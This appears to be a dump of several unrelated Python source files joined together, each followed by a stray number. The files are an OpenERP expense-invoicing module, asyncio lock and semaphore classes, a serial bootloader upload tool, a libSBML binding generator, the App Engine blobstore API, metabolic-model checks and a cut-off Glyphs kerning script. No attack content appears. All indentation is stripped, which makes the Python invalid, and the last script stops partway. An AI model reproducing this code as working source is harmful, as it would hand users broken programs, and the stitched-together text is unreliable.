# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.osv.orm import intersect
from openerp.tools.translate import _
from openerp.addons.decimal_precision import decimal_precision as dp
class account_analytic_account(osv.osv):
_name = "account.analytic.account"
_inherit = "account.analytic.account"
def _get_total_estimation(self, account):
tot_est = super(account_analytic_account, self)._get_total_estimation(account)
if account.charge_expenses:
tot_est += account.est_expenses
return tot_est
def _get_total_invoiced(self, account):
total_invoiced = super(account_analytic_account, self)._get_total_invoiced(account)
if account.charge_expenses:
total_invoiced += account.expense_invoiced
return total_invoiced
def _get_total_remaining(self, account):
total_remaining = super(account_analytic_account, self)._get_total_remaining(account)
if account.charge_expenses:
total_remaining += account.remaining_expense
return total_remaining
def _get_total_toinvoice(self, account):
total_toinvoice = super(account_analytic_account, self)._get_total_toinvoice(account)
if account.charge_expenses:
total_toinvoice += account.expense_to_invoice
return total_toinvoice
def _remaining_expnse_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
if account.est_expenses != 0:
res[account.id] = max(account.est_expenses - account.expense_invoiced, account.expense_to_invoice)
else:
res[account.id]=0.0
return res
def _expense_to_invoice_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
#We don't want consolidation for each of these fields because those complex computation is resource-greedy.
for account in self.pool.get('account.analytic.account').browse(cr, uid, ids, context=context):
cr.execute("""
SELECT product_id, sum(amount), user_id, to_invoice, sum(unit_amount), product_uom_id, line.name
FROM account_analytic_line line
LEFT JOIN account_analytic_journal journal ON (journal.id = line.journal_id)
WHERE account_id = %s
AND journal.type = 'purchase'
AND invoice_id IS NULL
AND to_invoice IS NOT NULL
GROUP BY product_id, user_id, to_invoice, product_uom_id, line.name""", (account.id,))
res[account.id] = 0.0
for product_id, total_amount, user_id, factor_id, qty, uom, line_name in cr.fetchall():
#the amount to reinvoice is the real cost. We don't use the pricelist
total_amount = -total_amount
factor = self.pool.get('hr_timesheet_invoice.factor').browse(cr, uid, factor_id, context=context)
res[account.id] += total_amount * (100 - factor.factor or 0.0) / 100.0
return res
def _expense_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
lines_obj = self.pool.get('account.analytic.line')
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = 0.0
line_ids = lines_obj.search(cr, uid, [('account_id','=', account.id), ('invoice_id','!=',False), ('to_invoice','!=', False), ('journal_id.type', '=', 'purchase')], context=context)
#Put invoices in separate array in order not to calculate them double
invoices = []
for line in lines_obj.browse(cr, uid, line_ids, context=context):
if line.invoice_id not in invoices:
invoices.append(line.invoice_id)
for invoice in invoices:
res[account.id] += invoice.amount_untaxed
return res
def _ca_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
result = super(account_analytic_account, self)._ca_invoiced_calc(cr, uid, ids, name, arg, context=context)
for acc in self.browse(cr, uid, result.keys(), context=context):
result[acc.id] = result[acc.id] - (acc.expense_invoiced or 0.0)
return result
_columns = {
'charge_expenses' : fields.boolean('Charge Expenses'),
'expense_invoiced' : fields.function(_expense_invoiced_calc, type="float"),
'expense_to_invoice' : fields.function(_expense_to_invoice_calc, type='float'),
'remaining_expense' : fields.function(_remaining_expnse_calc, type="float"),
'est_expenses': fields.float('Estimation of Expenses to Invoice'),
'ca_invoiced': fields.function(_ca_invoiced_calc, type='float', string='Invoiced Amount',
help="Total customer invoiced amount for this account.",
digits_compute=dp.get_precision('Account')),
}
def on_change_template(self, cr, uid, id, template_id, context=None):
res = super(account_analytic_account, self).on_change_template(cr, uid, id, template_id, context=context)
if template_id and 'value' in res:
template = self.browse(cr, uid, template_id, context=context)
res['value']['charge_expenses'] = template.charge_expenses
res['value']['est_expenses'] = template.est_expenses
return res
def open_hr_expense(self, cr, uid, ids, context=None):
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
dummy, act_window_id = mod_obj.get_object_reference(cr, uid, 'hr_expense', 'expense_all')
result = act_obj.read(cr, uid, act_window_id, context=context)
line_ids = self.pool.get('hr.expense.line').search(cr,uid,[('analytic_account', 'in', ids)])
result['domain'] = [('line_ids', 'in', line_ids)]
names = [account.name for account in self.browse(cr, uid, ids, context=context)]
result['name'] = _('Expenses of %s') % ','.join(names)
result['context'] = {'analytic_account': ids[0]}
result['view_type'] = 'form'
return result
def hr_to_invoice_expense(self, cr, uid, ids, context=None):
domain = [('invoice_id','=',False),('to_invoice','!=',False), ('journal_id.type', '=', 'purchase'), ('account_id', 'in', ids)]
names = [record.name for record in self.browse(cr, uid, ids, context=context)]
name = _('Expenses to Invoice of %s') % ','.join(names)
return {
'type': 'ir.actions.act_window',
'name': name,
'view_type': 'form',
'view_mode': 'tree,form',
'domain' : domain,
'res_model': 'account.analytic.line',
'nodestroy': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 0.006497 |
"""Synchronization primitives."""
__all__ = ['Lock', 'Event', 'Condition', 'Semaphore', 'BoundedSemaphore']
import collections
from . import events
from . import futures
from .coroutines import coroutine
class _ContextManager:
"""Context manager.
This enables the following idiom for acquiring and releasing a
lock around a block:
with (yield from lock):
<block>
while failing loudly when accidentally using:
with lock:
<block>
"""
def __init__(self, lock):
self._lock = lock
def __enter__(self):
# We have no use for the "as ..." clause in the with
# statement for locks.
return None
def __exit__(self, *args):
try:
self._lock.release()
finally:
self._lock = None # Crudely prevent reuse.
class Lock:
"""Primitive lock objects.
A primitive lock is a synchronization primitive that is not owned
by a particular coroutine when locked. A primitive lock is in one
of two states, 'locked' or 'unlocked'.
It is created in the unlocked state. It has two basic methods,
acquire() and release(). When the state is unlocked, acquire()
changes the state to locked and returns immediately. When the
state is locked, acquire() blocks until a call to release() in
another coroutine changes it to unlocked, then the acquire() call
resets it to locked and returns. The release() method should only
be called in the locked state; it changes the state to unlocked
and returns immediately. If an attempt is made to release an
unlocked lock, a RuntimeError will be raised.
When more than one coroutine is blocked in acquire() waiting for
the state to turn to unlocked, only one coroutine proceeds when a
release() call resets the state to unlocked; first coroutine which
is blocked in acquire() is being processed.
acquire() is a coroutine and should be called with 'yield from'.
Locks also support the context management protocol. '(yield from lock)'
should be used as context manager expression.
Usage:
lock = Lock()
...
yield from lock
try:
...
finally:
lock.release()
Context manager usage:
lock = Lock()
...
with (yield from lock):
...
Lock objects can be tested for locking state:
if not lock.locked():
yield from lock
else:
# lock is acquired
...
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._locked = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self._locked else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Return True if lock is acquired."""
return self._locked
@coroutine
def acquire(self):
"""Acquire a lock.
This method blocks until the lock is unlocked, then sets it to
locked and returns True.
"""
if not self._waiters and not self._locked:
self._locked = True
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._locked = True
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a lock.
When the lock is locked, reset it to unlocked, and return.
If any other coroutines are blocked waiting for the lock to become
unlocked, allow exactly one of them to proceed.
When invoked on an unlocked lock, a RuntimeError is raised.
There is no return value.
"""
if self._locked:
self._locked = False
# Wake up the first waiter who isn't cancelled.
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
break
else:
raise RuntimeError('Lock is not acquired.')
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
# This must exist because __enter__ exists, even though that
# always raises; that's how the with-statement works.
pass
def __iter__(self):
# This is not a coroutine. It is meant to enable the idiom:
#
# with (yield from lock):
# <block>
#
# as an alternative to:
#
# yield from lock.acquire()
# try:
# <block>
# finally:
# lock.release()
yield from self.acquire()
return _ContextManager(self)
class Event:
"""Asynchronous equivalent to threading.Event.
Class implementing event objects. An event manages a flag that can be set
to true with the set() method and reset to false with the clear() method.
The wait() method blocks until the flag is true. The flag is initially
false.
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._value = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'set' if self._value else 'unset'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def is_set(self):
"""Return True if and only if the internal flag is true."""
return self._value
def set(self):
"""Set the internal flag to true. All coroutines waiting for it to
become true are awakened. Coroutine that call wait() once the flag is
true will not block at all.
"""
if not self._value:
self._value = True
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
def clear(self):
"""Reset the internal flag to false. Subsequently, coroutines calling
wait() will block until set() is called to set the internal flag
to true again."""
self._value = False
@coroutine
def wait(self):
"""Block until the internal flag is true.
If the internal flag is true on entry, return True
immediately. Otherwise, block until another coroutine calls
set() to set the flag to true, then return True.
"""
if self._value:
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
class Condition:
"""Asynchronous equivalent to threading.Condition.
This class implements condition variable objects. A condition variable
allows one or more coroutines to wait until they are notified by another
coroutine.
A new Lock object is created and used as the underlying lock.
"""
def __init__(self, lock=None, *, loop=None):
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
if lock is None:
lock = Lock(loop=self._loop)
elif lock._loop is not self._loop:
raise ValueError("loop argument must agree with lock")
self._lock = lock
# Export the lock's locked(), acquire() and release() methods.
self.locked = lock.locked
self.acquire = lock.acquire
self.release = lock.release
self._waiters = collections.deque()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
@coroutine
def wait(self):
"""Wait until notified.
If the calling coroutine has not acquired the lock when this
method is called, a RuntimeError is raised.
This method releases the underlying lock, and then blocks
until it is awakened by a notify() or notify_all() call for
the same condition variable in another coroutine. Once
awakened, it re-acquires the lock and returns True.
"""
if not self.locked():
raise RuntimeError('cannot wait on un-acquired lock')
self.release()
try:
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
finally:
yield from self.acquire()
@coroutine
def wait_for(self, predicate):
"""Wait until a predicate becomes true.
The predicate should be a callable which result will be
interpreted as a boolean value. The final predicate value is
the return value.
"""
result = predicate()
while not result:
yield from self.wait()
result = predicate()
return result
def notify(self, n=1):
"""By default, wake up one coroutine waiting on this condition, if any.
If the calling coroutine has not acquired the lock when this method
is called, a RuntimeError is raised.
This method wakes up at most n of the coroutines waiting for the
condition variable; it is a no-op if no coroutines are waiting.
Note: an awakened coroutine does not actually return from its
wait() call until it can reacquire the lock. Since notify() does
not release the lock, its caller should.
"""
if not self.locked():
raise RuntimeError('cannot notify on un-acquired lock')
idx = 0
for fut in self._waiters:
if idx >= n:
break
if not fut.done():
idx += 1
fut.set_result(False)
def notify_all(self):
"""Wake up all threads waiting on this condition. This method acts
like notify(), but wakes up all waiting threads instead of one. If the
calling thread has not acquired the lock when this method is called,
a RuntimeError is raised.
"""
self.notify(len(self._waiters))
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class Semaphore:
"""A Semaphore implementation.
A semaphore manages an internal counter which is decremented by each
acquire() call and incremented by each release() call. The counter
can never go below zero; when acquire() finds that it is zero, it blocks,
waiting until some other thread calls release().
Semaphores also support the context management protocol.
The optional argument gives the initial value for the internal
counter; it defaults to 1. If the value given is less than 0,
ValueError is raised.
"""
def __init__(self, value=1, *, loop=None):
if value < 0:
raise ValueError("Semaphore initial value must be >= 0")
self._value = value
self._waiters = collections.deque()
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked,value:{}'.format(
self._value)
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Returns True if semaphore can not be acquired immediately."""
return self._value == 0
@coroutine
def acquire(self):
"""Acquire a semaphore.
If the internal counter is larger than zero on entry,
decrement it by one and return True immediately. If it is
zero on entry, block, waiting until some other coroutine has
called release() to make it larger than 0, and then return
True.
"""
if not self._waiters and self._value > 0:
self._value -= 1
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._value -= 1
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a semaphore, incrementing the internal counter by one.
When it was zero on entry and another coroutine is waiting for it to
become larger than zero again, wake up that coroutine.
"""
self._value += 1
for waiter in self._waiters:
if not waiter.done():
waiter.set_result(True)
break
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class BoundedSemaphore(Semaphore):
"""A bounded semaphore implementation.
This raises ValueError in release() if it would increase the value
above the initial value.
"""
def __init__(self, value=1, *, loop=None):
self._bound_value = value
super().__init__(value, loop=loop)
def release(self):
if self._value >= self._bound_value:
raise ValueError('BoundedSemaphore released too many times')
super().release()
| 0 |
import argparse
import os
import math
import serial
import xmodem
import progressbar
parser = argparse.ArgumentParser()
parser.add_argument("port", help="Serial port used to communicate with OBC")
parser.add_argument("file", help="Binary file to upload")
parser.add_argument("description", help="Description for binary")
parser.add_argument("index", help="Slot for binary file (0-5)", nargs='+')
parser.add_argument("--nowait", required=False, help="No wait for bootloader", action='store_true')
args = parser.parse_args()
class Bootloader:
def __init__(self, port):
self._port = port
def wait(self):
self._wait_for('&')
self._port.write('S')
self._wait_for(':')
self._port.write('\n')
self._wait_for('#')
def upload_binary(self, index, description, stream):
# type: (int, str, file) -> bool
self._port.write('x')
self._wait_for('Boot Index: ')
self._port.write(str(index))
self._wait_for('Upload Binary: ')
widgets = [
'Uploading to slot %d ' % index, progressbar.Percentage(),
' ', progressbar.Bar(marker='#', left='[', right=']'),
' ', progressbar.ETA(),
' ', progressbar.FileTransferSpeed(),
]
file_size = os.fstat(f.fileno()).st_size
with progressbar.ProgressBar(widgets=widgets, max_value=file_size) as bar:
modem = xmodem.XMODEM(getc=self._xmodem_getc, putc=self._xmodem_putc)
r = modem.send(stream, quiet=True, callback=self._xmodem_report_progress(bar, file_size))
if not r:
print 'Upload failed!'
return False
self._wait_for('Boot Description: ')
self._port.write(description)
self._port.write('\0\n')
self._wait_for('Done!')
def _wait_for(self, marker):
s = ''
while not s.endswith(marker):
s += self._port.read(1)
def _xmodem_getc(self, size, timeout=1):
d = self._port.read(size)
return d
def _xmodem_putc(self, data, timeout=1):
l = self._port.write(data)
return l
def _xmodem_report_progress(self, bar, file_size):
# type: (progressbar.ProgressBar, int) -> function
def report(_, success_count, error_count):
packet_size = 128
transferred_size = min([file_size, packet_size * success_count])
bar.update(transferred_size)
return report
def verify_correct_format(file):
header = file.read(4)
if header[0] == ':':
print "Selected HEX file, you have to select BIN file"
return False
elif 'ELF' in header:
print "Selected ELF file, you have to select BIN file"
return False
file.seek(0)
return True
with file(args.file, 'rb') as f:
if not verify_correct_format(f):
exit(1)
port = serial.Serial(port=args.port, baudrate=115200)
print args
bootloader = Bootloader(port)
if args.nowait == False:
print 'Waiting for bootloader'
bootloader.wait()
print 'Bootloader ready'
else:
print 'User claims that bootloader is ready'
for slot in args.index:
with file(args.file, 'rb') as f:
bootloader.upload_binary(int(slot), args.description, f)
| 0.002358 |
#!/usr/bin/env python
#
# @file CMakeFiles.py
# @brief class for generating the cmake files
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2015 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
from util import global_variables
from . import DowncastExtensionFile
from . import DowncastNamespaceFile
from . import DowncastPackagesFile
from . import DowncastPluginsFile
from . import NativeSwigFile
from . import BaseBindingsFiles
class BindingFiles():
"""Class for all Bindings files"""
def __init__(self, pkg_object, binding, verbose=False):
# # members from object
self.package = pkg_object['name']
self.verbose = verbose
self.binding = binding
self.language = global_variables.language
self.elements = pkg_object['baseElements']
self.plugins = pkg_object['plugins']
#########################################################################
# package files
def write_downcast_extension(self):
if not global_variables.is_package:
return
name = 'local-downcast-extension-{0}'.format(self.package)
ext = DowncastExtensionFile.DowncastExtensionFile(name,
self.package,
self.binding)
if self.verbose:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_namespace(self):
if not global_variables.is_package:
return
name = 'local-downcast-namespaces-{0}'.format(self.package)
ext = DowncastNamespaceFile.DowncastNamespaceFile(name,
self.package,
self.binding)
if self.verbose:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_packages(self):
if not global_variables.is_package:
return
if self.binding == 'csharp' or self.binding == 'java':
name = 'local-packages-{0}'.format(self.package)
else:
name = 'local-downcast-packages-{0}'.format(self.package)
ext = DowncastPackagesFile.DowncastPackagesFile(name,
self.package,
self.binding,
self.elements,
self.plugins)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_plugins(self):
if not global_variables.is_package:
return
name = 'local-downcast-plugins-{0}'.format(self.package)
ext = DowncastPluginsFile.DowncastPluginsFile(name,
self.package,
self.binding,
self.plugins)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
#########################################################################
# local files
def write_local(self):
if global_variables.is_package:
self.write_local_package_files()
else:
self.write_local_library_files()
def write_local_package_files(self):
if self.binding == 'csharp' or self.binding == 'java':
return
else:
name = 'local-{0}'.format(self.package)
ext = DowncastPackagesFile.DowncastPackagesFile(name,
self.package,
self.binding,
self.elements,
self.plugins,
True)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_local_library_files(self):
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
self.binding, True)
base_files.write_files()
########################################################################
# write files in the swig directory
def write_swig_files(self):
if global_variables.is_package:
self.write_swig_package_files()
else:
self.write_swig_library_files()
def write_swig_package_files(self):
name = '{0}-package'.format(self.package)
ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
self.plugins, is_header=True)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
name = '{0}-package'.format(self.package)
ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
self.plugins, is_header=False)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_swig_library_files(self):
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
'swig', True)
base_files.write_files()
########################################################################
# other library files
def write_cmake_file(self):
if global_variables.is_package:
return
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
self.binding, True)
base_files.write_files()
########################################################################
def write_files(self):
if self.binding != 'swig':
self.write_downcast_extension()
self.write_downcast_namespace()
self.write_downcast_packages()
self.write_downcast_plugins()
self.write_local()
else:
self.write_swig_files()
| 0 |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A Python blobstore API used by app developers.
Contains methods uses to interface with Blobstore API. Defines db.Key-like
class representing a blob-key. Contains API part that forward to apiproxy.
"""
import datetime
import time
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import datastore
from google.appengine.api import datastore_errors
from google.appengine.api import datastore_types
from google.appengine.api import api_base_pb
from google.appengine.api.blobstore import blobstore_service_pb
from google.appengine.runtime import apiproxy_errors
__all__ = ['BLOB_INFO_KIND',
'BLOB_KEY_HEADER',
'BLOB_RANGE_HEADER',
'MAX_BLOB_FETCH_SIZE',
'UPLOAD_INFO_CREATION_HEADER',
'BlobFetchSizeTooLargeError',
'BlobKey',
'BlobNotFoundError',
'DataIndexOutOfRangeError',
'Error',
'InternalError',
'create_upload_url',
'delete',
'fetch_data',
]
BlobKey = datastore_types.BlobKey
BLOB_INFO_KIND = '__BlobInfo__'
BLOB_KEY_HEADER = 'X-AppEngine-BlobKey'
BLOB_RANGE_HEADER = 'X-AppEngine-BlobRange'
MAX_BLOB_FETCH_SIZE = (1 << 20) - (1 << 15)
UPLOAD_INFO_CREATION_HEADER = 'X-AppEngine-Upload-Creation'
_BASE_CREATION_HEADER_FORMAT = '%Y-%m-%d %H:%M:%S'
class Error(Exception):
"""Base blobstore error type."""
class InternalError(Error):
"""Raised when an internal error occurs within API."""
class BlobNotFoundError(Error):
"""Raised when attempting to access blob data for non-existant blob."""
class DataIndexOutOfRangeError(Error):
"""Raised when attempting to access indexes out of range in wrong order."""
class BlobFetchSizeTooLargeError(Error):
"""Raised when attempting to fetch too large a block from a blob."""
class _CreationFormatError(Error):
"""Raised when attempting to parse bad creation date format."""
def _ToBlobstoreError(error):
"""Translate an application error to a datastore Error, if possible.
Args:
error: An ApplicationError to translate.
"""
error_map = {
blobstore_service_pb.BlobstoreServiceError.INTERNAL_ERROR:
InternalError,
blobstore_service_pb.BlobstoreServiceError.BLOB_NOT_FOUND:
BlobNotFoundError,
blobstore_service_pb.BlobstoreServiceError.DATA_INDEX_OUT_OF_RANGE:
DataIndexOutOfRangeError,
blobstore_service_pb.BlobstoreServiceError.BLOB_FETCH_SIZE_TOO_LARGE:
BlobFetchSizeTooLargeError,
}
if error.application_error in error_map:
return error_map[error.application_error](error.error_detail)
else:
return error
def _format_creation(stamp):
"""Format an upload creation timestamp with milliseconds.
This method is necessary to format a timestamp with microseconds on Python
versions before 2.6.
Cannot simply convert datetime objects to str because the microseconds are
stripped from the format when set to 0. The upload creation date format will
always have microseconds padded out to 6 places.
Args:
stamp: datetime.datetime object to format.
Returns:
Formatted datetime as Python 2.6 format '%Y-%m-%d %H:%M:%S.%f'.
"""
return '%s.%06d' % (stamp.strftime(_BASE_CREATION_HEADER_FORMAT),
stamp.microsecond)
def _parse_creation(creation_string, field_name):
"""Parses upload creation string from header format.
Parse creation date of the format:
YYYY-mm-dd HH:MM:SS.ffffff
Y: Year
m: Month (01-12)
d: Day (01-31)
H: Hour (00-24)
M: Minute (00-59)
S: Second (00-59)
f: Microsecond
Args:
creation_string: String creation date format.
Returns:
datetime object parsed from creation_string.
Raises:
_CreationFormatError when the creation string is formatted incorrectly.
"""
split_creation_string = creation_string.split('.', 1)
if len(split_creation_string) != 2:
raise _CreationFormatError(
'Could not parse creation %s in field %s.' % (creation_string,
field_name))
timestamp_string, microsecond = split_creation_string
try:
timestamp = time.strptime(timestamp_string,
_BASE_CREATION_HEADER_FORMAT)
microsecond = int(microsecond)
except ValueError:
raise _CreationFormatError('Could not parse creation %s in field %s.'
% (creation_string, field_name))
return datetime.datetime(*timestamp[:6] + tuple([microsecond]))
def create_upload_url(success_path,
_make_sync_call=apiproxy_stub_map.MakeSyncCall):
"""Create upload URL for POST form.
Args:
success_path: Path within application to call when POST is successful
and upload is complete.
_make_sync_call: Used for dependency injection in tests.
"""
request = blobstore_service_pb.CreateUploadURLRequest()
response = blobstore_service_pb.CreateUploadURLResponse()
request.set_success_path(success_path)
try:
_make_sync_call('blobstore', 'CreateUploadURL', request, response)
except apiproxy_errors.ApplicationError, e:
raise _ToBlobstoreError(e)
return response.url()
def delete(blob_keys, _make_sync_call=apiproxy_stub_map.MakeSyncCall):
"""Delete a blob from Blobstore.
Args:
blob_keys: Single instance or list of blob keys. A blob-key can be either
a string or an instance of BlobKey.
_make_sync_call: Used for dependency injection in tests.
"""
if isinstance(blob_keys, (basestring, BlobKey)):
blob_keys = [blob_keys]
request = blobstore_service_pb.DeleteBlobRequest()
for blob_key in blob_keys:
request.add_blob_key(str(blob_key))
response = api_base_pb.VoidProto()
try:
_make_sync_call('blobstore', 'DeleteBlob', request, response)
except apiproxy_errors.ApplicationError, e:
raise _ToBlobstoreError(e)
def fetch_data(blob_key, start_index, end_index,
_make_sync_call=apiproxy_stub_map.MakeSyncCall):
"""Fetch data for blob.
See docstring for ext.blobstore.fetch_data for more details.
Args:
blob: BlobKey, str or unicode representation of BlobKey of
blob to fetch data from.
start_index: Start index of blob data to fetch. May not be negative.
end_index: End index (exclusive) of blob data to fetch. Must be
>= start_index.
Returns:
str containing partial data of blob. See docstring for
ext.blobstore.fetch_data for more details.
Raises:
See docstring for ext.blobstore.fetch_data for more details.
"""
if not isinstance(start_index, (int, long)):
raise TypeError('start_index must be integer.')
if not isinstance(end_index, (int, long)):
raise TypeError('end_index must be integer.')
if isinstance(blob_key, BlobKey):
blob_key = str(blob_key).decode('utf-8')
elif isinstance(blob_key, str):
blob_key = blob_key.decode('utf-8')
elif not isinstance(blob_key, unicode):
raise TypeError('Blob-key must be str, unicode or BlobKey: %s' % blob_key)
if start_index < 0:
raise DataIndexOutOfRangeError(
'May not fetch blob at negative index.')
if end_index < start_index:
raise DataIndexOutOfRangeError(
'Start index %d > end index %d' % (start_index, end_index))
fetch_size = end_index - start_index + 1
if fetch_size > MAX_BLOB_FETCH_SIZE:
raise BlobFetchSizeTooLargeError(
'Blob fetch size is too large: %d' % fetch_size)
request = blobstore_service_pb.FetchDataRequest()
response = blobstore_service_pb.FetchDataResponse()
request.set_blob_key(blob_key)
request.set_start_index(start_index)
request.set_end_index(end_index)
try:
_make_sync_call('blobstore', 'FetchData', request, response)
except apiproxy_errors.ApplicationError, e:
raise _ToBlobstoreError(e)
return response.data()
| 0.006391 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from math import isinf, isnan
from warnings import warn
NOT_MASS_BALANCED_TERMS = {"SBO:0000627", # EXCHANGE
"SBO:0000628", # DEMAND
"SBO:0000629", # BIOMASS
"SBO:0000631", # PSEUDOREACTION
"SBO:0000632", # SINK
}
def check_mass_balance(model):
unbalanced = {}
for reaction in model.reactions:
if reaction.annotation.get("SBO") not in NOT_MASS_BALANCED_TERMS:
balance = reaction.check_mass_balance()
if balance:
unbalanced[reaction] = balance
return unbalanced
# no longer strictly necessary, done by optlang solver interfaces
def check_reaction_bounds(model):
warn("no longer necessary, done by optlang solver interfaces",
DeprecationWarning)
errors = []
for reaction in model.reactions:
if reaction.lower_bound > reaction.upper_bound:
errors.append("Reaction '%s' has lower bound > upper bound" %
reaction.id)
if isinf(reaction.lower_bound):
errors.append("Reaction '%s' has infinite lower_bound" %
reaction.id)
elif isnan(reaction.lower_bound):
errors.append("Reaction '%s' has NaN for lower_bound" %
reaction.id)
if isinf(reaction.upper_bound):
errors.append("Reaction '%s' has infinite upper_bound" %
reaction.id)
elif isnan(reaction.upper_bound):
errors.append("Reaction '%s' has NaN for upper_bound" %
reaction.id)
return errors
def check_metabolite_compartment_formula(model):
errors = []
for met in model.metabolites:
if met.formula is not None and len(met.formula) > 0:
if not met.formula.isalnum():
errors.append("Metabolite '%s' formula '%s' not alphanumeric" %
(met.id, met.formula))
return errors
| 0 |
#MenuTitle: Remove Kerning Pairs for Selected Glyphs
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__="""
Deletes all kerning pairs with the selected glyphs, for the current master only.
"""
Font = Glyphs.font
Master = Font.selectedFontMaster
selectedLayers = Font.selectedLayers
listOfIDs = [ x.parent.id for x in selectedLayers ]
